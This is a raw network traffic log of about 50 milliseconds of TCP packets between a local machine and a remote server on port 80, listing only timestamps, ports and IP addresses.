Oct 16, 2021 16:53:24.569458008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569487095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569498062 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569536924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569536924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569555998 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569582939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569597006 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569654942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569694042 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569708109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569721937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569760084 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569762945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570043087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570095062 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570121050 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570148945 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570156097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570210934 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570214033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570267916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570270061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570331097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570338011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570385933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570439100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570453882 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570485115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570489883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570533037 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570540905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570597887 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570605040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570650101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570664883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570710897 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570714951 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570768118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570780993 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570816040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570823908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570873976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570887089 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570928097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570945978 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.570981026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.570988894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571038961 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571047068 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571100950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571173906 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571186066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571234941 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571260929 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571284056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571285009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571335077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571336031 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571379900 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571383953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571435928 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571482897 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571496964 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571542978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571594000 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571605921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571605921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571660995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571681976 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571702003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571733952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571743965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571777105 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571808100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571845055 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571860075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.571861982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571916103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.571978092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572027922 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572046041 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572057009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572066069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572081089 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572104931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572151899 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572156906 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572166920 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572211027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572253942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572263956 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572268963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572310925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572316885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572356939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572360039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572407961 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572416067 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572468042 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572470903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572515965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572525978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572571039 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572581053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572633028 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572637081 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572684050 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572691917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572735071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572751999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572798014 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572812080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572858095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572874069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572921038 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572930098 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.572976112 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.572987080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573034048 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573045015 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573097944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573151112 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573158026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573167086 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573215008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573251009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573275089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573292017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573323011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573331118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573379040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573385954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573436022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573443890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573489904 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573501110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573548079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573553085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573597908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573611975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573657990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573672056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573717117 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573733091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573781013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573791027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573838949 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573844910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573896885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573950052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.573952913 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.573973894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574004889 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574007988 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574069023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574071884 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574126005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574127913 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574189901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574198008 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574249983 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574250937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574304104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574347973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574403048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574408054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574461937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574462891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574508905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574520111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574568033 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574578047 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574629068 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574631929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574680090 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574697018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574759007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574790955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574800014 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574819088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574871063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574879885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574923992 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.574940920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.574995995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575025082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575056076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575059891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575110912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575222969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575309038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575366974 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575371981 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575442076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575444937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575489044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575506926 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575566053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575619936 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575623035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575673103 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575681925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575738907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575794935 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575795889 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575820923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575820923 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575844049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575865030 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575869083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575894117 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575895071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575921059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575944901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575969934 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.575970888 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.575977087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576000929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576030016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576050997 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576056004 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576056957 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576061010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576067924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576081991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576105118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576124907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576133966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576147079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576168060 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576188087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576190948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576195955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576216936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576240063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576241970 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576261997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576273918 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576283932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576306105 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576308966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576328039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576354980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576354980 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576380014 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576384068 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576406002 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576406002 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576428890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576442957 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576455116 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.576461077 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576551914 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.576569080 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609172106 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609253883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609260082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609314919 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609412909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609464884 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609469891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609522104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609525919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609574080 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609579086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609631062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609633923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609683990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609688044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609735012 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609746933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609801054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.609801054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.609855890 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616018057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616064072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616101980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616136074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616141081 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616167068 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616198063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616200924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616241932 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616266966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616296053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616302013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616316080 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616336107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616365910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616378069 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616395950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616426945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616436005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616451025 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616451979 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616475105 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616504908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616518974 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616528034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616543055 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616564989 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616575956 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616605997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616636038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616642952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616663933 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616666079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616667986 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616695881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616724968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616727114 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616750956 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616755009 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616782904 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616791964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616800070 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616827011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616857052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616887093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616888046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616916895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616919041 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616945982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616951942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616976976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.616980076 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.616998911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.617007971 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.617038012 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.617046118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.617057085 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.617074013 CEST	80	49737	65.108.80.190	192.168.2.7
